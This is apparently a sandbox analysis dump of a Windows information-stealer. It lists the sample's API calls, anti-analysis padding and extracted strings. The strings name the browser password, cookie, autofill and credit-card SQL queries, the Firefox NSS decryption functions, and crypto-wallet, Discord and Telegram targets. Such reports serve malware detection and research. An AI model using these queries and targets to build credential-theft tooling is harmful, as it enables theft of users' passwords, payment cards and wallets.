                                                                • CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000685,00000000), ref: 004062AE
                                                                • SetEnvironmentVariableA.KERNEL32(09eaw99e,9r1zhjkf), ref: 004062C0
                                                                • CloseHandle.KERNEL32(00000000), ref: 004062C7
                                                                • OutputDebugStringA.KERNEL32(ti9nukpkj), ref: 004062DF
                                                                • CreateSemaphoreA.KERNEL32(00000004,00000004,00000001,XMLayaqc7kz), ref: 004062F9
                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000004), ref: 004062FF
                                                                • OutputDebugStringA.KERNEL32(trirngqb4), ref: 0040630A
                                                                • FindFirstFileA.KERNEL32(s_3y8eqp1f,?), ref: 00406322
                                                                • FindClose.KERNEL32(00000000), ref: 00406329
                                                                • CreateWaitableTimerA.KERNEL32(00000004,00000001,WTMR_rnsjk8ck), ref: 00406347
                                                                • OutputDebugStringA.KERNEL32(txko6u6fs), ref: 00406351
                                                                • CancelWaitableTimer.KERNEL32(?), ref: 0040635B
                                                                • CreateMutexA.KERNEL32(00000000,00000000,MTXy9bs4nx7), ref: 00406374
                                                                • GetLastError.KERNEL32 ref: 00406381
                                                                • ReleaseMutex.KERNEL32(?), ref: 0040638A
                                                                • OutputDebugStringA.KERNEL32(tci9y5j5y), ref: 00406395
                                                                • RegOpenKeyExA.ADVAPI32(80000001,regthvs75y8,00000000,00020019,?), ref: 004063AE
                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_ijgum66z), ref: 004063C7
                                                                • SetEnvironmentVariableA.KERNEL32(srjxnyfw,ly2md7as), ref: 004063D6
                                                                • CancelWaitableTimer.KERNEL32(?), ref: 004063E4
                                                                • OutputDebugStringA.KERNEL32(trxhpga6b), ref: 004063EF
                                                                • SetEnvironmentVariableA.KERNEL32(xjzuu3oe,qr8khxdr), ref: 004063FD
                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_9u1av0rn), ref: 00406416
                                                                • GetLastError.KERNEL32 ref: 0040641B
                                                                • CancelWaitableTimer.KERNEL32(?), ref: 00406429
                                                                • GetLastError.KERNEL32 ref: 0040642F
                                                                • OutputDebugStringA.KERNEL32(tzsphikyt), ref: 0040643C
                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_7eoqtgja), ref: 00406451
                                                                • OutputDebugStringA.KERNEL32(ta3z71hy7), ref: 0040645A
                                                                • CancelWaitableTimer.KERNEL32(00000000), ref: 0040645D
                                                                • CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,000009EE,00000000), ref: 0040647B
                                                                • FindCloseChangeNotification.KERNEL32(00000000), ref: 00406482
                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_024nomth), ref: 00406496
                                                                • CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLyeif1yte), ref: 004064AD
                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 004064B5
                                                                • GetLastError.KERNEL32 ref: 004064BB
                                                                • CreateMutexA.KERNEL32(00000000,00000000,MTX39bzbsag), ref: 004064D2
                                                                • ReleaseMutex.KERNEL32(00000000), ref: 004064DD
                                                                • RegOpenKeyExA.KERNEL32(80000001,regec2n4lmn,00000000,00020019,?), ref: 004064F7
                                                                  • Part of subcall function 0040ED79: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_t2lry32w), ref: 0040ED9D
                                                                  • Part of subcall function 0040ED79: CancelWaitableTimer.KERNEL32(00000000), ref: 0040EDA4
                                                                  • Part of subcall function 0040ED79: CreateMutexA.KERNEL32(00000000,00000000,MTX9of20kmn), ref: 0040EDB1
                                                                  • Part of subcall function 0040ED79: OutputDebugStringA.KERNELBASE(t6xplss11), ref: 0040EDCE
                                                                  • Part of subcall function 0040ED79: ReleaseMutex.KERNEL32(00000000), ref: 0040EDD1
                                                                  • Part of subcall function 0040ED79: RegOpenKeyExA.KERNEL32(80000001,regp7r1ymid,00000000,00020019,?), ref: 0040EDED
                                                                  • Part of subcall function 0040ED79: CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_7pn5tvkk), ref: 0040EE0A
                                                                  • Part of subcall function 0040ED79: ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040EE14
                                                                  • Part of subcall function 0040ED79: RegOpenKeyExA.KERNEL32(80000001,regd0052drm,00000000,00020019,?), ref: 0040EE32
                                                                  • Part of subcall function 0040ED79: LocalAlloc.KERNEL32(00000000,00000914), ref: 0040EE3A
                                                                  • Part of subcall function 0040ED79: RegOpenKeyExA.KERNEL32(80000001,regou0dc9en,00000000,00020019,00409D4B), ref: 0040EE57
                                                                  • Part of subcall function 0040ED79: LocalFree.KERNEL32(00000000), ref: 0040EE5A
                                                                  • Part of subcall function 0040ED79: CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLk6eld4rr), ref: 0040EE6B
                                                                  • Part of subcall function 0040ED79: ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040EE75
                                                                  • Part of subcall function 0040ED79: CreateEventA.KERNEL32(00000000,00000001,00000000,ev_gc0upe3h), ref: 0040EE84
                                                                  • Part of subcall function 0040ED79: SetEvent.KERNEL32(00000000), ref: 0040EE8D
                                                                  • Part of subcall function 0040ED79: ResetEvent.KERNEL32(00000000), ref: 0040EE94
                                                                  • Part of subcall function 0040ED79: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_mn0c9pqk), ref: 0040EEA3
                                                                  • Part of subcall function 0040ED79: GetLastError.KERNEL32 ref: 0040EEAB
                                                                  • Part of subcall function 0040ED79: OutputDebugStringA.KERNEL32(taidzcf8e), ref: 0040EDF6
                                                                  • Part of subcall function 0040ED79: OutputDebugStringA.KERNEL32(te82qlpx1), ref: 0040EDFD
                                                                  • Part of subcall function 0040ED79: CancelWaitableTimer.KERNEL32(00000000), ref: 0040EEB6
                                                                  • Part of subcall function 0040ED79: OutputDebugStringA.KERNELBASE(t4mysaur5), ref: 0040EEC8
                                                                  • Part of subcall function 0040ED79: LocalAlloc.KERNEL32(00000040,00000000), ref: 0040EEDD
                                                                  • Part of subcall function 0040ED79: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?), ref: 0040EEF1
                                                                  • Part of subcall function 0040ED79: CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000260,00000000), ref: 0040EF03
                                                                  • Part of subcall function 0040ED79: GetLastError.KERNEL32 ref: 0040EF0B
                                                                  • Part of subcall function 0040ED79: FindCloseChangeNotification.KERNEL32(00000000), ref: 0040EF12
                                                                  • Part of subcall function 0040ED79: FindFirstFileA.KERNEL32(s_78akpirh,?), ref: 0040EF24
                                                                  • Part of subcall function 0040ED79: FindClose.KERNEL32(00000000), ref: 0040EF2B
                                                                  • Part of subcall function 0040ED79: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_c33ulp1b), ref: 0040EF3A
                                                                  • Part of subcall function 0040ED79: CancelWaitableTimer.KERNEL32(00000000), ref: 0040EF45
                                                                  • Part of subcall function 0040ED79: RegOpenKeyExA.KERNEL32(80000001,regnnoidgbh,00000000,00020019,?), ref: 0040EF60
                                                                  • Part of subcall function 0040ED79: CreateEventA.KERNEL32(00000000,00000001,00000000,ev_5ur9xojv), ref: 0040EF6D
                                                                  • Part of subcall function 0040ED79: SetEvent.KERNEL32(00000000), ref: 0040EF76
                                                                  • Part of subcall function 0040ED79: ResetEvent.KERNEL32(00000000), ref: 0040EF7D
                                                                  • Part of subcall function 0040ED79: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_28kapc83), ref: 0040EF8B
                                                                  • Part of subcall function 0040ED79: CancelWaitableTimer.KERNEL32(00000000), ref: 0040EF92
                                                                  • Part of subcall function 0040ED79: CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLhgc16pbm), ref: 0040EFA1
                                                                  • Part of subcall function 0040ED79: ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040EFAB
                                                                  • Part of subcall function 0040ED79: OutputDebugStringA.KERNEL32(tih43o6yt), ref: 0040EFB6
                                                                  • Part of subcall function 0040ED79: OutputDebugStringA.KERNEL32(tdcs470r4), ref: 0040EFC0
                                                                  • Part of subcall function 0040ED79: LocalAlloc.KERNEL32(00000000,000000F1), ref: 0040EFCD
                                                                  • Part of subcall function 0040ED79: SetEnvironmentVariableA.KERNEL32(8hhspfe7,y8ldbn1v), ref: 0040EFE5
                                                                  • Part of subcall function 0040ED79: LocalFree.KERNEL32(00000000), ref: 0040EFE8
                                                                  • Part of subcall function 0040ED79: OutputDebugStringA.KERNEL32(t4xlw2t0n), ref: 0040EFF3
                                                                  • Part of subcall function 0040ED79: SetEnvironmentVariableA.KERNEL32(68l1qnot,pk835cg2), ref: 0040EFFF
                                                                • SetEnvironmentVariableA.KERNEL32(dwl78fay,z8zbvgpl), ref: 00406509
                                                                • OutputDebugStringA.KERNEL32(tvkat4fjq), ref: 00406514
                                                                • CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00001114,00000000), ref: 0040652C
                                                                • CloseHandle.KERNEL32(00000000), ref: 00406533
                                                                • SetEnvironmentVariableA.KERNEL32(kq2xlkz9,cb2ooln2), ref: 00406543
                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_zxk5sggz), ref: 0040655B
                                                                • CancelWaitableTimer.KERNEL32(00000000), ref: 0040655E
                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,ev_jddhpv9y), ref: 0040656D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2889570159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Create$Semaphore$TimerWaitable$Release$DebugEventOutputString$FileFind$Close$EnvironmentVariable$CancelOpen$Mutex$Local$ErrorLast$Mapping$Alloc$Reset$First$Handle$ChangeNotification$Free$ByteCharMultiWide
                                                                • String ID: %d) %s$%s %s$- Architecture: x%d$- CPU: %s (%d cores)$- Display Devices:%s$- Display size: %dx%d$- Locale: %s$- OS: %s$- RAM: %d MB$- Time zone: %c%ld minutes from GMT$ *A$","encryptedPassword":"$","guid":$","httpRealm":$"encrypted_key":"$"webextension@metamask.io":"$$%A$%sTRUE%s%s%s%s%s$&configId=$(#A$(,A$*.lnk$*/*$,%A$,)A$---$.dll$.sqlite$0+A$09eaw99e$288qh91m$3ctj9t2x$4yz9begi$5lg5ej3x$6okdm1tu$6pms62xl$7mhzuiqy$8"A$87039vfe$8ch0b0dd$93s4eclk$9r1zhjkf$://$<!A$<)A$ACCOUNT:%s|TOKEN:%s$BitBlt$Content-Disposition: form-data; name="file"; filename="$Content-Type: application/x-object$Content-Type: application/x-www-form-urlencoded; charset=utf-8$Content-Type: multipart/form-data; boundary=$Content-Type: text/plain;$Cookies$CreateCompatibleBitmap$CreateCompatibleDC$D%A$Default$DeleteObject$DisplayName$DisplayVersion$FALSE$GET$Gdi32.dll$GdiPlus.dll$GdipCreateBitmapFromHBITMAP$GdipDisposeImage$GdipGetImageEncoders$GdipGetImageEncodersSize$GdipSaveImageToFile$GdiplusStartup$GetObjectW$H*A$L'A$L(A$L)A$Local State$Login Data$Low$MTX1foxa753$MTX34s52bf3$MTX39bzbsag$MTX659bq5ml$MTXa8cu8u0k$MTXawf1ae1n$MTXdjgl1lda$MTXeuk0bqyk$MTXfk5pbuec$MTXj7l6ka3u$MTXq1n7w3bt$MTXqtzx8hp7$MTXrulvz4cj$MTXukdk5rol$MTXy9bs4nx7$MachineGuid$MetaMask$NSS_Init$NSS_Shutdown$NUM:%sHOLDER:%sEXP:%s/%s$Network\Cookies$P!A$P,A$PATH$PK11SDR_Decrypt$PK11_Authenticate$PK11_FreeSlot$PK11_GetInternalKeySlot$POST$ProductName$Profile %d$Profiles$S-1-5-18$SECITEM_FreeItem$SELECT fieldname, value FROM moz_formhistory$SELECT host, path, isSecure, expiry, name, value FROM moz_cookies$SELECT host_key, path, is_secure , expires_utc, name, encrypted_value FROM cookies$SELECT name, value FROM autofill$SELECT name_on_card, card_number_encrypted, expiration_month, expiration_year FROM credit_cards$SELECT origin_url, username_value, password_value FROM logins$SELECT service, encrypted_token FROM token_service$SMPHR_5rwhgvw3$SMPHR_65h3azn8$SMPHR_7zytb0ri$SMPHR_8yh5ft3y$SMPHR_942zrjhx$SMPHR_ahhs9tdw$SMPHR_bbz60kxw$SMPHR_c6rtxn2e$SMPHR_d0ezvgky$SMPHR_hkoaqvuo$SMPHR_iysbipi4$SMPHR_jbdif3fc$SMPHR_jfnhvoos$SMPHR_jttod3t8$SMPHR_llytb8bk$SOFTWARE\Microsoft\Cryptography$SOFTWARE\Microsoft\Windows NT\CurrentVersion$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall$SelectObject$SetStretchBltMode$Stable$StretchBlt$T"A$TRUE$URL:%sUSR:%sPASS:%s$User Data$WTMR_024nomth$WTMR_08qed3dz$WTMR_0n85vc3v$WTMR_1b5rxocf$WTMR_2lwdmtng$WTMR_2tpf3k9u$WTMR_3ulozhve$WTMR_4245xtfp$WTMR_68zl9c6n$WTMR_7eoqtgja$WTMR_8q2mlbb1$WTMR_9u1av0rn$WTMR_biq7qqp8$WTMR_bn76k1pi$WTMR_efiowg0u$WTMR_g0k9fdn1$WTMR_gxvpoqaz$WTMR_ijgum66z$WTMR_kzkrrc42$WTMR_l82rdxkg$WTMR_l9vi7zsm$WTMR_nrrqvpp8$WTMR_rnsjk8ck$WTMR_rv9lsjh5$WTMR_tes47dmi$WTMR_tkqhivt6$WTMR_upnz1jee$WTMR_yjyspzjz$WTMR_ywqblgmo$WTMR_zas83zwj$WTMR_zxk5sggz$Web Data$XML0vwx5qqa$XML796zf9ly$XMLayaqc7kz$XMLdav1qxqb$XMLdv4yvvx2$XMLea771d1v$XMLfg0ub50n$XMLit26gd8c$XMLlr84ct8q$XMLqrpms3fl$XMLrxdfmajw$XMLt0k88dpd$XMLu4fdevhq$XMLvl2yucl5$XMLx4yqw1al$XMLyeif1yte$XMLyoo3iq38$XMLz9za5ea8$\+A$\-A$\AccountTokens.txt$\CC.txt$\autofill.txt$\cookies.txt$\ffcookies.txt$\passwords.txt$ajncq7cv$ap1varzm$bilwyweo$c6nxfun9$c6qmvpwn$c82yqntn$cb2ooln2$cookies.sqlite$dscrd_$dwl78fay$encryptedUsername":"$ev_1yp16plg$ev_2yigbh0u$ev_4yh9mboq$ev_5k43o4b3$ev_83ghue7f$ev_9cfo1p3l$ev_bhdojfck$ev_bvya3woa$ev_h08jrwbj$ev_jddhpv9y$ev_mf0tns34$ev_mkv5p20y$ev_tc91xtzg$ev_tk2vs67b$ev_vo68bl08$evp5wksa$ews_$explorer.exe$extensions$formhistory.sqlite$fz8ld49v$gi25app2$gqnuu3oi$grbr_$gtks8w9w$h3srciic$hostname":"$hr1ql1ui$i32zb19a$iaat1l8d$image/jpeg$jneak3tj$jyawzxle$kq2xlkz9$krdqzy7f$l(A$ldop5nfk$ldr_$libs$logins.json$ly2md7as$m6wsuix9$machineId=$nser2o02$nss3.dll$ny8b8dyz$ohpcw67a$open$ouljkvyw$p$A$p'A$p6xpux7o$p8hh1gs2$pd3ssdbv$pera $ppmrnxtn$prefs.js$q61o789w$q7t7v6a8$qr8khxdr$qvmmqy34$reg0l6t893i$reg48zflry0$reg4t533bzq$reg77ah2op2$reg9vp9wahe$regbssywy3j$regcybb0am7$regec2n4lmn$regfaerruq6$regfwav6hjm$reggwktxg2i$regh037c70m$regh57c5y01$regiepztbw6$regiwldu3lh$regjj3pi0uk$regjwczwiv1$regk6y32ko4$regkj50vwml$regkukujc1n$regnmhit5i7$regnw0xpzk8$regon8lhjmk$regpnezg2ar$regso4yxzed$regthvs75y8$ro27ovri$s_0rhtpalp$s_34kdzx3i$s_3y8eqp1f$s_aor9vzq7$s_b2q4tb82$s_bcfre8zh$s_chnzpjge$s_eutb36gm$s_fh9hh7uu$s_lbbp44mn$s_nxlib5zf$s_zlpk6fi9$scrnsht_$sgnl_$sqlite3.dll$sqlite3_close$sqlite3_column_blob$sqlite3_column_bytes16$sqlite3_column_text16$sqlite3_finalize$sqlite3_open16$sqlite3_prepare_v2$sqlite3_step$srjxnyfw$sstmnfo_$stats_version":"$storage\default$t)A$t*A$t00dnerjm$t0yhzp32e$t177nyisu$t1f98jrxw$t374uhtn$t60xwhd9g$t811wbm0h$t8mzisows$t8x0ufnff$t9lthrm9u$ta3z71hy7$tabqa92dv$tb5ozaklm$tci9y5j5y$tgnaptnne$tgwabdohg$th2xy09eh$tht6hiwda$ti9nukpkj$tiklkzfzv$tixn00umv$tk49ljafb$tkcq1j60r$tl1wdo764$tlgrm_$tlsubx3d4$tm7gm98q4$tntjlvy28$token:$tov5q26c7$tp9vj0b43$tqmqpycwx$tqpd21biq$tqpzwpfbx$trirngqb4$trxhpga6b$tspltdjl$tsv0hbria$tvkat4fjq$tw54zebwr$tw931ljur$txko6u6fs$txmwu9rge$ty46st8d5$tz5kl8u5q$tzsphikyt$tzuizwazx$u6m5ltiw$v10$vgko7r23$vq8nojgl$vqbq3kvg$wallet.dat$wallets$wlts_$xjzuu3oe$xtntns_$y0t5yda9$ynm9y2h9$z8zbvgpl$|"A$|#A$|%A$|'A$|-A$#A$+A$,A
                                                                • API String ID: 1254322392-329154
                                                                • Opcode ID: 41deb5c26e9e69cb7efd74576d889c36931fec03bca5f2c375b178b6982c1c58
                                                                • Instruction ID: 5e740a273b51b3ffba0b4ed496176ddaae92a82a5524f114896138874b80e7b8
                                                                • Opcode Fuzzy Hash: 41deb5c26e9e69cb7efd74576d889c36931fec03bca5f2c375b178b6982c1c58
                                                                • Instruction Fuzzy Hash: 13034C75A40754EBD710ABA1AD49FDA3F65EB88785F10803AF701AA1F0DBF854D08B5C
                                                                Function 00409ADC Relevance: 899.3, APIs: 324, Strings: 189, Instructions: 1575timeregistrymemoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • LocalAlloc.KERNEL32(00000000,000009EA), ref: 00409AF3
                                                                • LocalFree.KERNEL32(00000000), ref: 00409AFA
                                                                • OutputDebugStringA.KERNEL32(tw0xu14w8), ref: 00409B0B
                                                                • CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLb8uaoddh), ref: 00409B16
                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 00409B20
                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_adwimds2), ref: 00409B34
                                                                • CancelWaitableTimer.KERNEL32(00000000), ref: 00409B3B
                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_t9m6egtl), ref: 00409B49
                                                                • SetEnvironmentVariableA.KERNEL32(xs5vk1s3,yiiah0mu), ref: 00409B5D
                                                                • CancelWaitableTimer.KERNEL32(00000000), ref: 00409B60
                                                                • CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_ryx02sq6), ref: 00409B71
                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 00409B7B
                                                                • CoInitialize.OLE32(00000000), ref: 00409B82
                                                                • CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000D46,00000000), ref: 00409B94
                                                                • SetEnvironmentVariableA.KERNEL32(ge955tme,xzk43o9r), ref: 00409BA6
                                                                • FindCloseChangeNotification.KERNEL32(00000000), ref: 00409BA9
                                                                • SetEnvironmentVariableA.KERNEL32(d4cmirb6,f1tx9ijh), ref: 00409BB9
                                                                • CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLjlel85wp), ref: 00409BC6
                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 00409BD0
                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_dyzpca0g), ref: 00409BE4
                                                                • CancelWaitableTimer.KERNEL32(00000000), ref: 00409BE7
                                                                • RegOpenKeyExA.KERNEL32(80000001,regl9ou77sk,00000000,00020019,?), ref: 00409C02
                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_v69s0jur), ref: 00409C10
                                                                • CancelWaitableTimer.KERNEL32(00000000), ref: 00409C17
                                                                • GetLastError.KERNEL32 ref: 00409C1F
                                                                • CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_e2jplyy5), ref: 00409C2E
                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 00409C38
                                                                • OutputDebugStringA.KERNEL32(tygxt7169), ref: 00409C4E
                                                                • LocalAlloc.KERNEL32(00000000,00000D79), ref: 00409C5B
                                                                • LocalFree.KERNEL32(00000000), ref: 00409C62
                                                                • OutputDebugStringA.KERNEL32(tv8nwi2ye), ref: 00409C70
                                                                • CreateWaitableTimerA.KERNEL32(00000009,00000001,WTMR_2txq3mdt), ref: 00409C7F
                                                                • OutputDebugStringA.KERNEL32(ty1p0rbxh), ref: 00409C8A
                                                                • CancelWaitableTimer.KERNEL32(?), ref: 00409C9B
                                                                • CreateMutexA.KERNEL32(00000000,00000000,MTXpzc2har6), ref: 00409CAA
                                                                • SetEnvironmentVariableA.KERNEL32(omc9fsdv,ft98khpd), ref: 00409CC2
                                                                • ReleaseMutex.KERNEL32(?), ref: 00409CC8
                                                                • OutputDebugStringA.KERNEL32(tp32whtjp), ref: 00409CD5
                                                                  • Part of subcall function 0040ED79: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_t2lry32w), ref: 0040ED9D
                                                                  • Part of subcall function 0040ED79: CancelWaitableTimer.KERNEL32(00000000), ref: 0040EDA4
                                                                  • Part of subcall function 0040ED79: CreateMutexA.KERNEL32(00000000,00000000,MTX9of20kmn), ref: 0040EDB1
                                                                  • Part of subcall function 0040ED79: OutputDebugStringA.KERNELBASE(t6xplss11), ref: 0040EDCE
                                                                  • Part of subcall function 0040ED79: ReleaseMutex.KERNEL32(00000000), ref: 0040EDD1
                                                                  • Part of subcall function 0040ED79: RegOpenKeyExA.KERNEL32(80000001,regp7r1ymid,00000000,00020019,?), ref: 0040EDED
                                                                  • Part of subcall function 0040ED79: CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_7pn5tvkk), ref: 0040EE0A
                                                                  • Part of subcall function 0040ED79: ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040EE14
                                                                  • Part of subcall function 0040ED79: RegOpenKeyExA.KERNEL32(80000001,regd0052drm,00000000,00020019,?), ref: 0040EE32
                                                                  • Part of subcall function 0040ED79: LocalAlloc.KERNEL32(00000000,00000914), ref: 0040EE3A
                                                                  • Part of subcall function 0040ED79: RegOpenKeyExA.KERNEL32(80000001,regou0dc9en,00000000,00020019,00409D4B), ref: 0040EE57
                                                                  • Part of subcall function 0040ED79: LocalFree.KERNEL32(00000000), ref: 0040EE5A
                                                                  • Part of subcall function 0040ED79: CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLk6eld4rr), ref: 0040EE6B
                                                                  • Part of subcall function 0040ED79: ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040EE75
                                                                  • Part of subcall function 0040ED79: CreateEventA.KERNEL32(00000000,00000001,00000000,ev_gc0upe3h), ref: 0040EE84
                                                                  • Part of subcall function 0040ED79: SetEvent.KERNEL32(00000000), ref: 0040EE8D
                                                                  • Part of subcall function 0040ED79: ResetEvent.KERNEL32(00000000), ref: 0040EE94
                                                                  • Part of subcall function 0040ED79: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_mn0c9pqk), ref: 0040EEA3
                                                                  • Part of subcall function 0040ED79: GetLastError.KERNEL32 ref: 0040EEAB
                                                                • CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLf3sp4yo9), ref: 00409CE2
                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 00409CED
                                                                • SetEnvironmentVariableA.KERNEL32(1yqp8rgm,qjqhz0u1), ref: 00409CFD
                                                                • CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_2eq14qd1), ref: 00409D0A
                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 00409D15
                                                                • OutputDebugStringA.KERNEL32(tamx0g12y), ref: 00409D24
                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_vyhzltt5), ref: 00409D2F
                                                                • ExitProcess.KERNEL32 ref: 00409D3B
                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_tr76xwe3), ref: 00409D58
                                                                • CancelWaitableTimer.KERNEL32(00000000), ref: 00409D5B
                                                                • SetEnvironmentVariableA.KERNEL32(f5p68xvg,llliohkc), ref: 00409D6B
                                                                • CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_6lpzdlwo), ref: 00409D78
                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 00409D83
                                                                • OutputDebugStringA.KERNEL32(tjetkpjp5), ref: 00409D99
                                                                • FindFirstFileA.KERNEL32(s_2ubk6zki,?), ref: 00409DA5
                                                                • FindClose.KERNEL32(00000000), ref: 00409DAC
                                                                • LocalAlloc.KERNEL32(00000000,00000B49), ref: 00409DB9
                                                                • LocalFree.KERNEL32(00000000), ref: 00409DC0
                                                                • GetLastError.KERNEL32 ref: 00409DC6
                                                                • SetEnvironmentVariableA.KERNEL32(002oxa6s,lsdlhn77), ref: 00409DD9
                                                                • CreateWaitableTimerA.KERNEL32(00000001,00000001,WTMR_vxf9syn6), ref: 00409DE8
                                                                • GetLastError.KERNEL32 ref: 00409DF4
                                                                • CancelWaitableTimer.KERNEL32(?), ref: 00409E05
                                                                • CreateMutexA.KERNEL32(00000000,00000000,MTXs7yc2cpf), ref: 00409E27
                                                                • ReleaseMutex.KERNEL32(00000000), ref: 00409E32
                                                                • SetEnvironmentVariableA.KERNEL32(uy3n4usz,9kcjkxl4), ref: 00409E42
                                                                • GetLastError.KERNEL32 ref: 00409E46
                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,ev_mo34bm41), ref: 00409E53
                                                                • SetEvent.KERNEL32(00000000), ref: 00409E5C
                                                                • ResetEvent.KERNEL32(00000000), ref: 00409E63
                                                                • CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLnusjnsj4), ref: 00409E74
                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 00409E7E
                                                                • RegOpenKeyExA.ADVAPI32(80000001,regxdm8zho5,00000000,00020019,?), ref: 00409E99
                                                                • CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000BA0,00000000), ref: 00409EAB
                                                                • SetEnvironmentVariableA.KERNEL32(161wgn8y,p1bpvb3k), ref: 00409EBD
                                                                • FindCloseChangeNotification.KERNEL32(00000000), ref: 00409EC0
                                                                • SetEnvironmentVariableA.KERNEL32(e0qagkaq,f35cv2jv), ref: 00409ED0
                                                                • LocalAlloc.KERNEL32(00000000,0000080A), ref: 00409ED9
                                                                • LocalFree.KERNEL32(00000000), ref: 00409EE0
                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_sj1xw7ld), ref: 00409EF5
                                                                • OutputDebugStringA.KERNEL32(tlvo7moy8), ref: 00409F00
                                                                • CancelWaitableTimer.KERNEL32(?), ref: 00409F0B
                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_cjcjokyw), ref: 00409F1A
                                                                • CancelWaitableTimer.KERNEL32(00000000), ref: 00409F1D
                                                                • RegOpenKeyExA.ADVAPI32(80000001,regihm21o6p,00000000,00020019,?), ref: 00409F39
                                                                • LocalAlloc.KERNEL32(00000000), ref: 00409F57
                                                                • SetEnvironmentVariableA.KERNEL32(ku9syi5h,c5wa0nkd), ref: 00409F69
                                                                • LocalFree.KERNEL32(00000000), ref: 00409F6C
                                                                • SetEnvironmentVariableA.KERNEL32(p44tx6zp,eazbdckw), ref: 00409F7C
                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_90d3uvs3), ref: 00409F88
                                                                • CancelWaitableTimer.KERNEL32(00000000), ref: 00409F93
                                                                • SetEnvironmentVariableA.KERNEL32(9as963us,27tkawec), ref: 00409FA5
                                                                • CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000AAB,00000000), ref: 00409FB3
                                                                • GetLastError.KERNEL32 ref: 00409FBB
                                                                • FindCloseChangeNotification.KERNEL32(00000000), ref: 00409FC2
                                                                • CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XML0vfjvhca), ref: 00409FD9
                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 00409FE0
                                                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_p0n3nl7z), ref: 00409FEF
                                                                • CancelWaitableTimer.KERNEL32(00000000), ref: 00409FF6
                                                                • RegOpenKeyExA.ADVAPI32(80000001,regpf00k4ni,00000000,00020019,?), ref: 0040A012
                                                                • CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_y57u78i2), ref: 0040A023
                                                                • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040A02A
                                                                • RegOpenKeyExA.ADVAPI32(80000001,regln1bdbu9,00000000,00020019,?), ref: 0040A04A
                                                                • OutputDebugStringA.KERNEL32(tqeqy21fj), ref: 0040A057
                                                                • FindFirstFileA.KERNEL32(s_prfrvct4,?), ref: 0040A076
                                                                • FindClose.KERNEL32(00000000), ref: 0040A07D
                                                                • CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_uop44cey), ref: 0040A08E
